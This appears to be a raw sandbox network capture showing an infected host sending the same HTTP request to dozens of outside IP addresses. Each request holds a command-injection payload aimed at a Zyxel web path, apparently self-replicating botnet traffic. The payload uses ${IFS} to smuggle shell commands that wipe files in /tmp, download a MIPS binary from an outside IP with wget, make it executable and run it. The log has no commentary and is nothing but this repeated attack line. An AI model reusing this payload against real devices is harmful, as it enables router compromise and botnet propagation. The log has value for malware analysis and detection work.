                                                  Jan 19, 2024 18:23:56.067507029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4576192.168.2.1342482221.110.31.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.067562103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4577192.168.2.1336812198.145.167.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.076811075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4578192.168.2.1341420128.23.245.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.076849937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4579192.168.2.134714064.206.13.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.076903105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4580192.168.2.134085459.80.66.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.076940060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4581192.168.2.1360464152.252.239.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.076982975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4582192.168.2.1345416174.62.216.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077039003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4583192.168.2.1360366149.130.108.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077085018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4584192.168.2.1359342165.243.200.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077105999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4585192.168.2.1340584202.177.61.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077145100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4586192.168.2.1335206118.54.93.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077182055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4587192.168.2.135081443.9.238.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077210903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4588192.168.2.135281441.201.58.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077250957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4589192.168.2.135984247.76.93.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077290058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4590192.168.2.134013060.84.122.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077315092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4591192.168.2.133394843.53.247.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077366114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4592192.168.2.136086498.74.157.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077404022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4593192.168.2.134221051.217.174.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077418089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4594192.168.2.1351196191.9.177.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077476978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4595192.168.2.1354712178.131.73.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077510118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4596192.168.2.1335744136.52.185.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077539921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4597192.168.2.1334594221.151.130.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077605009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4598192.168.2.1335550204.130.251.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077632904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4599192.168.2.135016271.52.195.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077668905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4600192.168.2.134875613.148.190.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077702045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4601192.168.2.133499658.213.59.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077737093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4602192.168.2.135532289.77.155.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077769995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4603192.168.2.135675290.32.221.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077822924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4604192.168.2.133957261.119.141.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077858925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4605192.168.2.1334880183.137.224.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077902079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4606192.168.2.1355830175.64.182.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077922106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4607192.168.2.1358736174.17.146.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.077974081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4608192.168.2.135601899.49.46.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078027964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4609192.168.2.1342262205.104.182.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078059912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4610192.168.2.133965460.113.30.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078120947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4611192.168.2.135198020.148.191.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078155994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4612192.168.2.133867298.212.161.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078191042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4613192.168.2.1346450219.30.12.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078218937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4614192.168.2.134354234.0.200.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078259945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4615192.168.2.1353396183.82.160.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078303099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4616192.168.2.1358168200.239.254.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078336954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4617192.168.2.13541601.41.87.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078380108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4618192.168.2.135385281.218.1.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078413963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4619192.168.2.1357468134.130.9.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078449011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4620192.168.2.135580663.192.75.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078511953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4621192.168.2.1334368136.216.160.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078552961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4622192.168.2.1348464132.7.67.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078599930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4623192.168.2.1352878210.119.4.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078641891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4624192.168.2.1342686177.153.47.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078676939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4625192.168.2.13418929.214.139.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078721046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4626192.168.2.1349412139.248.60.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078768969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4627192.168.2.1338588110.61.116.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078824997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4628192.168.2.135909825.206.19.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078864098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4629192.168.2.13471265.12.134.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078898907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4630192.168.2.1342830115.32.137.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078936100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4631192.168.2.135687488.44.54.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.078989029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4632192.168.2.1354674128.221.151.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079030037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4633192.168.2.136079474.43.222.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079080105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4634192.168.2.1351748121.29.48.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079128981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4635192.168.2.1348744156.77.17.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079179049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4636192.168.2.1345274211.235.19.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079211950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4637192.168.2.134941062.148.43.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079241991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4638192.168.2.134512898.206.207.136443
                                                  TimestampBytes transferredDirectionData
